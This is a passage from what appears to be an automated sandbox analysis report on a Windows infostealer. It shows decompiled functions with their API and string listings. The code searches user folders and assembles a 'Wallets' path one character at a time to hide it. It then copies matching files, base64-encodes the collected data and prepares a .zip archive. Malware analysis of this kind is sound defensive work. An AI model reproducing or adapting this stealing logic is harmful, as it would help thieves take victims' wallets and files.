				 *0x4474e0(_t260 - 0x8e8, ".zip");
				_t165 = E0040EFE5(_t260 - 0x8e8, __eflags); // executed
				_push(_t243);
				_push(_t165);
				_t166 = E004088D2(0, _t243, 0x5f5e100, _t253, __eflags);
				_t231 =  *0x447138; // 0x6ecac8
				 *0x44729c = _t166; // executed
				_t167 = E0040B7F8(0, _t231, 0x43d12c, 0);
				_t232 =  *0x44769c; // 0x1
				 *((char*)(_t260 - 0x95f)) = _t232;
				_t233 =  *0x44769d; // 0x1
				 *((char*)(_t260 - 0x95e)) = _t233;
				_t234 =  *0x44769f; // 0x0
				 *((char*)(_t260 - 0x95d)) = _t234;
				_t235 =  *0x4476a0; // 0x1
				 *((char*)(_t260 - 0x95c)) = _t235;
				_t236 =  *0x4476a1; // 0x1
				_t268 =  &(_t267[0xc]);
				__eflags =  *0x44769e; // 0x1
				 *((char*)(_t260 - 0x95b)) = _t236;
				_t237 =  *0x4472ac; // 0x0
				 *(_t260 - 0x940) = _t237;
				_t238 = _t237 & 0xffffff00 | __eflags != 0x00000000;
				_t254 = _t260 - 0x960;
				 *((char*)(_t260 - 0x960)) = 1;
				 *((char*)(_t260 - 0x95a)) = _t237 & 0xffffff00 | __eflags != 0x00000000;
				E00414A9F(_t243, _t260 - 0x960, __eflags, _t167, _t243);
				__eflags =  *0x4476a0; // 0x1
				if(__eflags != 0) {
					E0040C547(_t243, _t254);
				}
				__eflags =  *0x4476a4; // 0x0
				if(__eflags != 0) {
					E004097E0(0, _t243, 0x43d12c, __eflags); // executed
				}
				E0040BBA9(_t238, _t243, __eflags, _t294);
				__eflags =  *0x44769e; // 0x1
				if(__eflags != 0) {
					E0040D8F4(0, 0x43d12c, _t260 - 0x928, __eflags); // executed
				}
				E0040A7FB(_t243, __eflags);
				__eflags =  *0x4476a2; // 0x1
				if(__eflags != 0) {
					E004182AF(_t243); // executed
				}
				_t172 =  *0x4472ac; // 0x0
				E0041EB14(_t172, _t238, _t260 - 0x92c, _t260 - 0x930);
				_t249 = 0;
				 *(_t260 - 0x934) = 0;
				__eflags =  *(_t260 - 0x92c);
				if( *(_t260 - 0x92c) != 0) {
					_t184 = CryptBinaryToStringA( *(_t260 - 0x92c),  *(_t260 - 0x930), 0x40000001, 0, _t260 - 0x934);
					__eflags = _t184;
					if(_t184 != 0) {
						_t186 = RtlAllocateHeap(GetProcessHeap(), 0,  *(_t260 - 0x934)); // executed
						_t249 = _t186;
						__eflags = _t249;
						if(_t249 != 0) {
							E0041F6B0(_t249, 0,  *(_t260 - 0x934));
							_t268 =  &(_t268[0xc]);
							CryptBinaryToStringA( *(_t260 - 0x92c),  *(_t260 - 0x930), 0x40000001, _t249, _t260 - 0x934);
						}
					}
				}
				 *(_t260 - 0x938) =  *(_t260 - 0x934);
				_t255 = E0040B89F;
				 *(_t260 - 0x93c) = _t249;
				CreateThread(0, 0, E0040B89F, _t260 - 0x93c, 0, 0); // executed
				_t250 = 0;
				while(1) {
					__eflags =  *0x4476a8; // 0x0
					if(__eflags != 0) {
						goto L50;
					}
					__eflags =  *0x4476ac; // 0x1
					if(__eflags != 0) {
						L51:
						E0041F6B0(0x4472ac, 0, 4);
						E0041F6B0(0x4472b0, 0, 4);
						E00418094(); // executed
						E00404A66(_t260 - 0x928, 1, 0);
						return E004236C3(0, _t250, _t255);
					}
					__eflags = _t250 - 0x3c;
					if(_t250 == 0x3c) {
						CreateThread(0, 0, _t255, _t260 - 0x93c, 0, 0);
						_t250 = 0;
						__eflags = 0;
					}
					Sleep(0x3e8); // executed
					_t250 =  &(_t250[1]);
					__eflags = _t250;
				}
				do {
					L50:
					Sleep(0x3e8);
					__eflags =  *0x4476b0; // 0x0
				} while (__eflags == 0);
				goto L51;
			}

0x0040c670
0x0040c670
0x0040c670
0x0040c670
0x0040c670
0x0040c67a
0x0040c681
0x0040c68b
0x0040c691
0x0040c697
0x0040c69a
0x0040c69f
0x0040c6b1
0x0040c6bb
0x0040c6c1
0x0040c6c7
0x0040c6cc
0x0040c6d5
0x0040c6da
0x0040c6e2
0x0040c6e4
0x0040c6e4
0x0040c6ee
0x0040c6fd
0x0040c700
0x0040c705
0x0040c70b
0x0040c710
0x0040c714
0x0040c718
0x0040c71a
0x0040c71a
0x0040c724
0x0040c733
0x0040c736
0x0040c73b
0x0040c741
0x0040c746
0x0040c74e
0x0040c750
0x0040c750
0x0040c75a
0x0040c763
0x0040c769
0x0040c76c
0x0040c771
0x0040c78a
0x0040c793
0x0040c799
0x0040c7a0
0x00000000
0x00000000
0x0040c779
0x0040c784
0x0040c784
0x0040c7b7
0x0040c7c4
0x0040c7c9
0x0040c7d8
0x0040c7e5
0x0040c7ea
0x0040c7ee
0x0040c7f2
0x0040c7f4
0x0040c7f4
0x0040c7fe
0x0040c807
0x0040c80d
0x0040c810
0x0040c815
0x0040c815
0x0040c81a
0x0040c81f
0x0040c826
0x0040c82b
0x0040c82e
0x0040c834
0x0040c83b
0x0040c847
0x0040c84b
0x0040c850
0x0040c858
0x0040c859
0x0040c85d
0x0040c862
0x0040c868
0x0040c86e
0x0040c871
0x0040c87d
0x0040c882
0x0040c887
0x0040c889
0x0040c889
0x0040c88b
0x0040c892
0x0040c898
0x0040c89a
0x0040c89c
0x0040c8a5
0x0040c8a7
0x0040c8ae
0x0040c8b3
0x0040c8b6
0x0040c8bc
0x0040c8c3
0x0040c8c8
0x0040c8cb
0x0040c8d0
0x0040c8d3
0x0040c8d3
0x0040c8df
0x0040c8e4
0x0040c8e6
0x0040c8e6
0x0040c8ea
0x0040c8f0
0x0040c8f2
0x00000000
0x00000000
0x0040c8f8
0x0040c8fd
0x0040c902
0x0040c909
0x0040c90e
0x0040c911
0x0040c917
0x0040c91e
0x0040c92a
0x0040c92e
0x0040c933
0x0040c93b
0x0040c93c
0x0040c940
0x0040c945
0x0040c951
0x0040c954
0x0040c960
0x0040c965
0x0040c967
0x0040c967
0x0040c96b
0x0040c971
0x0040c973
0x0040c975
0x0040c980
0x0040c987
0x0040c98c
0x0040c98f
0x0040c995
0x0040c99c
0x0040c9a1
0x0040c9a4
0x0040c9a9
0x0040c9ac
0x0040c9ac
0x0040c9b8
0x0040c9bd
0x0040c9bf
0x0040c9bf
0x0040c9c3
0x0040c9c9
0x0040c9cb
0x00000000
0x0040c9cd
0x0040c9cd
0x0040c9d6
0x0040c9d8
0x0040c9df
0x0040c9e4
0x0040c9e7
0x0040c9ed
0x0040c9f4
0x0040c9f9
0x0040c9fc
0x0040ca01
0x0040ca0b
0x0040ca0d
0x0040ca0d
0x0040ca15
0x0040ca1b
0x0040ca1d
0x00000000
0x0040ca1f
0x0040ca24
0x00000000
0x0040ca24
0x0040ca1d
0x0040c9cb
0x0040ca34
0x0040ca3e
0x0040ca4b
0x0040ca50
0x0040ca55
0x0040ca58
0x0040ca5f
0x0040ca61
0x0040ca61
0x0040ca6e
0x0040ca80
0x0040ca88
0x0040ca96
0x0040caa8
0x0040cab4
0x0040cab9
0x0040caba
0x0040cabb
0x0040cac0
0x0040cacc
0x0040cad1
0x0040cad6
0x0040cadc
0x0040cae2
0x0040cae8
0x0040caee
0x0040caf4
0x0040cafa
0x0040cb00
0x0040cb06
0x0040cb0c
0x0040cb0f
0x0040cb15
0x0040cb1b
0x0040cb22
0x0040cb28
0x0040cb2c
0x0040cb32
0x0040cb39
0x0040cb3f
0x0040cb44
0x0040cb4a
0x0040cb4c
0x0040cb4c
0x0040cb51
0x0040cb57
0x0040cb59
0x0040cb59
0x0040cb5e
0x0040cb63
0x0040cb69
0x0040cb71
0x0040cb71
0x0040cb76
0x0040cb7b
0x0040cb81
0x0040cb83
0x0040cb83
0x0040cb8f
0x0040cb9a
0x0040cb9f
0x0040cba2
0x0040cba8
0x0040cbae
0x0040cbca
0x0040cbd0
0x0040cbd2
0x0040cbe2
0x0040cbe8
0x0040cbea
0x0040cbec
0x0040cbf6
0x0040cbfb
0x0040cc13
0x0040cc13
0x0040cbec
0x0040cbd2
0x0040cc21
0x0040cc2e
0x0040cc36
0x0040cc3c
0x0040cc42
0x0040cc73
0x0040cc73
0x0040cc79
0x00000000
0x00000000
0x0040cc46
0x0040cc4c
0x0040cc8e
0x0040cc96
0x0040cca6
0x0040ccae
0x0040ccbc
0x0040ccc6
0x0040ccc6
0x0040cc4e
0x0040cc51
0x0040cc5f
0x0040cc65
0x0040cc65
0x0040cc65
0x0040cc6c
0x0040cc72
0x0040cc72
0x0040cc72
0x0040cc7b
0x0040cc7b
0x0040cc80
0x0040cc86
0x0040cc86
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 0040C67A

Part of subcall function 0041A73C: GetProcAddress.KERNEL32(77280000,0040C6A4), ref: 0041A750
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A767
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A77E
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A795
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A7AC
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A7C3
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A7DA
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A7F1
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A808
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A81F
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A836
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A84D
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A864
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A87B
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A892
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A8A9
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A8C0
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A8D7
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A8EE
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A905
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A91C
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A933
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A94A
Part of subcall function 0041A73C: GetProcAddress.KERNEL32 ref: 0041A961

_memset.LIBCMT ref: 0040C6C7

Part of subcall function 00416A49: __EH_prolog3_GS.LIBCMT ref: 00416A53
Part of subcall function 00416A49: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416A94
Part of subcall function 00416A49: GetVolumeInformationA.KERNEL32 ref: 00416AD4
Part of subcall function 00416A49: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00416B29
Part of subcall function 00416A49: HeapAlloc.KERNEL32(00000000), ref: 00416B30

lstrcat.KERNEL32(?,00000000), ref: 0040C6EE
lstrcat.KERNEL32(?,00000000), ref: 0040C724
lstrcat.KERNEL32(?,00000000), ref: 0040C75A
CloseHandle.KERNEL32(00000000,?,?,?,00000954,0040CD33), ref: 0040C779
Sleep.KERNEL32(00001388,?,?,?,00000954,0040CD33), ref: 0040C784

Part of subcall function 0040B5B1: __EH_prolog3_GS.LIBCMT ref: 0040B5B8
Part of subcall function 0040B5B1: StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040B62D
Part of subcall function 0040B5B1: _strtok_s.LIBCMT ref: 0040B678
Part of subcall function 0040B5B1: lstrlenA.KERNEL32(?,?,?,?), ref: 0040B688
Part of subcall function 0040B5B1: _strlen.LIBCMT ref: 0040B694

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

OpenEventA.KERNEL32(001F0003,00000000,?,00000001,00000000,?,?,?,00000954,0040CD33), ref: 0040C793
CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000954,0040CD33), ref: 0040C7AC
_memset.LIBCMT ref: 0040C7C4
lstrcat.KERNEL32(?,0043F4D4), ref: 0040C7D8
lstrcat.KERNEL32(?,00000000), ref: 0040C7FE
StrCmpCA.SHLWAPI(005B1588,ERROR,00000001,00000000), ref: 0040C892
StrCmpCA.SHLWAPI(005B1588,ERROR), ref: 0040C8EA
StrCmpCA.SHLWAPI(005B1588,ERROR,00000001,00000000), ref: 0040C96B
StrCmpCA.SHLWAPI(005B1588,ERROR), ref: 0040C9C3

Part of subcall function 0040B6E9: __EH_prolog3_GS.LIBCMT ref: 0040B6F0
Part of subcall function 0040B6E9: StrCmpCA.SHLWAPI(00000000,https,00000040,0040CA01), ref: 0040B722
Part of subcall function 0040B6E9: StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040B780

StrCmpCA.SHLWAPI(004452CC,ERROR), ref: 0040CA15
Sleep.KERNEL32(0001D4C0), ref: 0040CA24
_memset.LIBCMT ref: 0040CA4B
lstrcat.KERNEL32(?,005B1588), ref: 0040CA6E
lstrcat.KERNEL32(?,0043F4D4), ref: 0040CA80
lstrcat.KERNEL32(?,00000000), ref: 0040CA96
lstrcat.KERNEL32(?,.zip), ref: 0040CAA8
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040CBCA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040CBDB
RtlAllocateHeap.NTDLL(00000000), ref: 0040CBE2
_memset.LIBCMT ref: 0040CBF6
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040CC13
CreateThread.KERNEL32(00000000,00000000,Function_0000B89F,?,00000000,00000000), ref: 0040CC3C
CreateThread.KERNEL32(00000000,00000000,Function_0000B89F,?,00000000,00000000), ref: 0040CC5F
Sleep.KERNEL32(000003E8), ref: 0040CC6C
Sleep.KERNEL32(000003E8), ref: 0040CC80
_memset.LIBCMT ref: 0040CC96
_memset.LIBCMT ref: 0040CCA6

Strings

.zip, xrefs: 0040CA9C
ERROR, xrefs: 0040C88B, 0040C890, 0040C8D3, 0040C8E8, 0040C969, 0040C9AC, 0040C9C1, 0040CA13

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$lstrcat$_memset$H_prolog3_HeapSleep$Create$BinaryCryptEventProcessStringThread$AllocAllocateCloseDirectoryHandleInformationOpenVolumeWindows_memmove_strlen_strtok_slstrlen
String ID: .zip$ERROR
API String ID: 388616173-80328473
Opcode ID: e17a3aa64760db90c7e64ca9a07094a617d65ccebf5546fafe5d69c3bee10bba
Instruction ID: 7908da7952841492f88e0da3b3623974fb63098ea509140e2e25be8f9e2ac420
Opcode Fuzzy Hash: e17a3aa64760db90c7e64ca9a07094a617d65ccebf5546fafe5d69c3bee10bba
Instruction Fuzzy Hash: 41F1F3B5905258EFEB10EB658C85A9E7B78EB46304F0004FAF508A3292D7384F85CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D624 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 191
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E0040D624(CHAR* __ecx, CHAR* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				char _v1072;
				struct _WIN32_FIND_DATAA _v1392;
				CHAR* _v1396;
				void* _v1400;
				CHAR* _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t57;
				int _t71;
				signed char _t84;
				CHAR* _t124;
				CHAR* _t132;
				signed int _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t130 = __edx;
				_t57 =  *0x444664; // 0xfa3a0753
				_v12 = _t57 ^ _t133;
				_v1412 = _a4;
				_v1408 = _a8;
				_t132 = __ecx;
				_t124 = __edx;
				_v1396 = __ecx;
				_v1404 = __edx;
				E0041F6B0( &_v544, 0, 0x104);
				_t135 = _t134 + 0xc;
				 *0x4474e0( &_v544, E004181BE(_t124, 0x104, _t132, 0x1a));
				if(_a12 == 0) {
					wsprintfA( &_v1072, "%s\\%s\\%s",  &_v544, _t132, _t124);
					_t136 = _t135 + 0x14;
				} else {
					wsprintfA( &_v1072, "%s\\%s\\*",  &_v544, _t132);
					_t136 = _t135 + 0x10;
				}
				_t71 = FindFirstFileA( &_v1072,  &_v1392); // executed
				_v1400 = _t71;
				if(_t71 == 0xffffffff) {
					L17:
					return E0041F69E(_t71, _t124, _v12 ^ _t133, _t130, 0x104, _t132);
				} else {
					_t132 = "\\";
					_t124 = "l";
					do {
						_push(".");
						_push( &(_v1392.cFileName));
						if( *0x447510() != 0) {
							_push("..");
							_push( &(_v1392.cFileName));
							if( *0x447510() != 0) {
								if(_a12 == 0) {
									wsprintfA( &_v808, "%s\\%s\\%s",  &_v544, _v1396,  &(_v1392.cFileName));
									_t136 = _t136 + 0x14;
								} else {
									wsprintfA( &_v808, "%s\\%s\\%s\\%s",  &_v544, _v1396,  &(_v1392.cFileName), _v1404);
									_t136 = _t136 + 0x18;
								}
								_t84 = GetFileAttributesA( &_v808);
								if(_t84 != 0xffffffff && (_t84 & 0x00000010) == 0) {
									E0041F6B0( &_v280, 0, 0x104);
									_t137 = _t136 + 0xc;
									 *0x4474e0( &_v280, _t132);
									 *0x4474e0( &_v280, "W");
									 *0x4474e0( &_v280, "a");
									 *0x4474e0( &_v280, _t124);
									 *0x4474e0( &_v280, _t124);
									 *0x4474e0( &_v280, "e");
									 *0x4474e0( &_v280, "t");
									 *0x4474e0( &_v280, "s");
									 *0x4474e0( &_v280, _t132);
									 *0x4474e0( &_v280, _v1412);
									 *0x4474e0( &_v280, _t132);
									 *0x4474e0( &_v280,  &(_v1392.cFileName));
									if(_a12 != 0) {
										 *0x4474e0( &_v280, _t132);
										 *0x4474e0( &_v280, _v1404);
									}
									E0041EAE0(_v1408,  &_v280, 0, 2);
									_t136 = _t137 + 0xc;
								}
							}
						}
					} while (FindNextFileA(_v1400,  &_v1392) != 0);
					_t71 = FindClose(_v1400);
					goto L17;
				}
			}

0x0040d624
0x0040d62d
0x0040d634
0x0040d63d
0x0040d64c
0x0040d658
0x0040d65a
0x0040d65f
0x0040d665
0x0040d66b
0x0040d670
0x0040d683
0x0040d693
0x0040d6bd
0x0040d6c3
0x0040d695
0x0040d6a3
0x0040d6a9
0x0040d6a9
0x0040d6d4
0x0040d6da
0x0040d6e3
0x0040d8e5
0x0040d8f3
0x0040d6e9
0x0040d6e9
0x0040d6ee
0x0040d6f3
0x0040d6f3
0x0040d6fe
0x0040d707
0x0040d70d
0x0040d718
0x0040d721
0x0040d731
0x0040d778
0x0040d77e
0x0040d733
0x0040d753
0x0040d759
0x0040d759
0x0040d788
0x0040d791
0x0040d7a9
0x0040d7ae
0x0040d7b9
0x0040d7cb
0x0040d7dd
0x0040d7eb
0x0040d7f9
0x0040d80b
0x0040d81d
0x0040d82f
0x0040d83d
0x0040d850
0x0040d85e
0x0040d872
0x0040d87c
0x0040d886
0x0040d899
0x0040d899
0x0040d8b6
0x0040d8bb
0x0040d8bb
0x0040d791
0x0040d721
0x0040d8d1
0x0040d8df
0x00000000
0x0040d8df

APIs

_memset.LIBCMT ref: 0040D66B

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 0040D683
wsprintfA.USER32 ref: 0040D6A3
wsprintfA.USER32 ref: 0040D6BD
FindFirstFileA.KERNEL32(?,?), ref: 0040D6D4
StrCmpCA.SHLWAPI(?,0043F354), ref: 0040D6FF
StrCmpCA.SHLWAPI(?,0043F358), ref: 0040D719
wsprintfA.USER32 ref: 0040D753
wsprintfA.USER32 ref: 0040D778
GetFileAttributesA.KERNEL32(?), ref: 0040D788
_memset.LIBCMT ref: 0040D7A9
lstrcat.KERNEL32(?,0043D134), ref: 0040D7B9
lstrcat.KERNEL32(?,0043F55C), ref: 0040D7CB
lstrcat.KERNEL32(?,0043F560), ref: 0040D7DD
lstrcat.KERNEL32(?,0043F564), ref: 0040D7EB
lstrcat.KERNEL32(?,0043F564), ref: 0040D7F9
lstrcat.KERNEL32(?,0043F568), ref: 0040D80B
lstrcat.KERNEL32(?,0043F56C), ref: 0040D81D
lstrcat.KERNEL32(?,0043F570), ref: 0040D82F
lstrcat.KERNEL32(?,0043D134), ref: 0040D83D
lstrcat.KERNEL32(?,?), ref: 0040D850
lstrcat.KERNEL32(?,0043D134), ref: 0040D85E
lstrcat.KERNEL32(?,?), ref: 0040D872
lstrcat.KERNEL32(?,0043D134), ref: 0040D886
lstrcat.KERNEL32(?,?), ref: 0040D899
FindNextFileA.KERNEL32(?,?), ref: 0040D8CB
FindClose.KERNEL32(?), ref: 0040D8DF

Strings

%s\%s\%s\%s, xrefs: 0040D74D
%s\%s\%s, xrefs: 0040D6B7, 0040D772
%s\%s\*, xrefs: 0040D69D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$FileFind_memset$AttributesCloseFirstFolderNextPath
String ID: %s\%s\%s$%s\%s\%s\%s$%s\%s\*
API String ID: 2308169423-1660153875
Opcode ID: 0a3f4b235c5159ef88f00197ba1dff586221c95c450aeb314e19dd9fa6e515e6
Instruction ID: 6490240e302f8c4c221ce81e3334a55d33d374696f1d55e5d09f6351c7ed1b2a
Opcode Fuzzy Hash: 0a3f4b235c5159ef88f00197ba1dff586221c95c450aeb314e19dd9fa6e515e6
Instruction Fuzzy Hash: 6C712C76D0021CABDB209FA0DD49FDA7B7CBB09755F1004B6B619E2190E7349B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00412548 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 146
filestringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00412548(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, char* _a12) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				char _v1072;
				char _v2072;
				struct _WIN32_FIND_DATAA _v2392;
				void* _v2396;
				intOrPtr _v2400;
				char* _v2404;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				int _t48;
				void* _t59;
				int _t64;
				void* _t79;
				CHAR* _t93;
				void* _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				signed int _t102;
				void* _t103;
				void* _t104;
				void* _t105;

				_t99 = __edx;
				_t41 =  *0x444664; // 0xfa3a0753
				_v12 = _t41 ^ _t102;
				_t101 = _a8;
				_t100 = _a4;
				_v2404 = _a12;
				_v2400 = __ecx;
				wsprintfA( &_v1072, "%s\\*", _t101);
				_t104 = _t103 + 0xc;
				_t48 = FindFirstFileA( &_v1072,  &_v2392); // executed
				_v2396 = _t48;
				if(_t48 == 0xffffffff) {
					L12:
					return E0041F69E(_t48, _t93, _v12 ^ _t102, _t99, _t100, _t101);
				}
				_t93 = "%s\\%s";
				do {
					_push(".");
					_push( &(_v2392.cFileName));
					if( *0x447510() != 0) {
						_push("..");
						_push( &(_v2392.cFileName));
						if( *0x447510() != 0) {
							wsprintfA( &_v808, _t93, _t101,  &(_v2392.cFileName));
							_t105 = _t104 + 0x10;
							_t59 =  *0x447510(_t100, 0x43d12c);
							_push( &(_v2392.cFileName));
							if(_t59 != 0) {
								wsprintfA( &_v544, _t93, _t100);
								_t104 = _t105 + 0x10;
							} else {
								wsprintfA( &_v544, "%s");
								_t104 = _t105 + 0xc;
							}
							_t64 = PathMatchSpecA( &(_v2392.cFileName), _v2404);
							_t112 = _t64;
							if(_t64 != 0) {
								E0041F6B0( &_v2072, 0, 0x3e8);
								 *0x4474e0( &_v2072,  *0x446d0c);
								 *0x4474e0( &_v2072,  &_v544);
								E0041F6B0( &_v280, 0, 0x104);
								 *0x4474e0( &_v280,  *0x447058);
								_t79 = 0x1a;
								 *0x4474e0( &_v280, E00417BB8(_t79, _t112));
								CopyFileA( &_v808,  &_v280, 1);
								E0041EAE0( *((intOrPtr*)(_v2400 + 0x20)),  &_v2072, 0, 2);
								_t104 = _t104 + 0x24;
								DeleteFileA( &_v280);
							}
							E00412548(_v2400, _t99,  &_v544,  &_v808, _v2404);
						}
					}
				} while (FindNextFileA(_v2396,  &_v2392) != 0);
				_t48 = FindClose(_v2396);
				goto L12;
			}

0x00412548
0x00412551
0x00412558
0x00412560
0x00412564
0x00412568
0x0041257a
0x00412580
0x00412586
0x00412597
0x0041259d
0x004125a6
0x0041275a
0x00412768
0x00412768
0x004125ac
0x004125b1
0x004125b1
0x004125bc
0x004125c5
0x004125cb
0x004125d6
0x004125df
0x004125f5
0x004125fb
0x00412604
0x00412612
0x00412619
0x0041262f
0x00412635
0x0041261b
0x00412621
0x00412627
0x00412627
0x00412645
0x0041264b
0x0041264d
0x00412661
0x00412676
0x0041268a
0x0041269e
0x004126b3
0x004126bb
0x004126c9
0x004126df
0x004126ff
0x00412704
0x0041270e
0x0041270e
0x0041272e
0x0041272e
0x004125df
0x00412746
0x00412754
0x00000000

APIs

wsprintfA.USER32 ref: 00412580
FindFirstFileA.KERNEL32(?,?), ref: 00412597
StrCmpCA.SHLWAPI(?,0043F354), ref: 004125BD
StrCmpCA.SHLWAPI(?,0043F358), ref: 004125D7
wsprintfA.USER32 ref: 004125F5
StrCmpCA.SHLWAPI(?,0043D12C), ref: 00412604
wsprintfA.USER32 ref: 00412621
wsprintfA.USER32 ref: 0041262F
PathMatchSpecA.SHLWAPI(?,?), ref: 00412645
_memset.LIBCMT ref: 00412661
lstrcat.KERNEL32(?), ref: 00412676
lstrcat.KERNEL32(?,?), ref: 0041268A
_memset.LIBCMT ref: 0041269E
lstrcat.KERNEL32(?), ref: 004126B3
lstrcat.KERNEL32(?,00000000), ref: 004126C9
CopyFileA.KERNEL32(?,?,00000001), ref: 004126DF
DeleteFileA.KERNEL32(?), ref: 0041270E
FindNextFileA.KERNEL32(?,?), ref: 00412740
FindClose.KERNEL32(?), ref: 00412754

Strings

%s\*, xrefs: 00412574
%s\%s, xrefs: 004125AC, 004125F3, 0041262D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcatwsprintf$Find$_memset$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\*
API String ID: 4163081628-2848263008
Opcode ID: 731c2b4406be6f09f170312ac7d5c924651adb3e9a16fba89d6715b4feee527e
Instruction ID: 565a48402c70592c0365ca1463cc39324051fbc31a9a92703b15674949954c58
Opcode Fuzzy Hash: 731c2b4406be6f09f170312ac7d5c924651adb3e9a16fba89d6715b4feee527e
Instruction Fuzzy Hash: 10513F7590121CABDB20DFA0DD89FDB77BCEB09705F0044A6F909E2151DB349A898F68

Uniqueness

Uniqueness Score: -1.00%

Function 00411603 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 181
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00411603(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				struct _WIN32_FIND_DATAA _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				void* _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t72;
				intOrPtr _t75;
				int _t80;
				int _t85;
				void* _t97;
				signed char _t101;
				signed int _t103;
				signed int _t105;
				intOrPtr _t112;
				CHAR* _t115;
				char* _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t131 = __edx;
				_t72 =  *0x444664; // 0xfa3a0753
				_v12 = _t72 ^ _t134;
				_t118 = _a24;
				_t133 = _a28;
				_t132 = _a12;
				_v1144 = _a4;
				_t75 = _a8;
				_v1140 = __ecx;
				_v1152 = _t75;
				_v1136 = _a16;
				_v1132 = _a20;
				_v1148 = _a24;
				wsprintfA( &_v808, "%s\\*", _t75);
				_t136 = _t135 + 0xc;
				_t80 = FindFirstFileA( &_v808,  &_v1128); // executed
				_v1156 = _t80;
				if(_t80 != 0xffffffff) {
					do {
						_push(".");
						_push( &(_v1128.cFileName));
						if( *0x447510() != 0) {
							_push("..");
							_push( &(_v1128.cFileName));
							if( *0x447510() != 0) {
								wsprintfA( &_v280, "%s\\%s", _v1152,  &(_v1128.cFileName));
								E0041F6B0( &_v544, 0, 0x104);
								wsprintfA( &_v544, "%s\\%s\\%s\\%s", _v1152,  &(_v1128.cFileName),  *0x4470d0,  *0x446a4c);
								_t136 = _t136 + 0x34;
								_t97 =  *0x447510( &(_v1128.cFileName),  *0x446ce8);
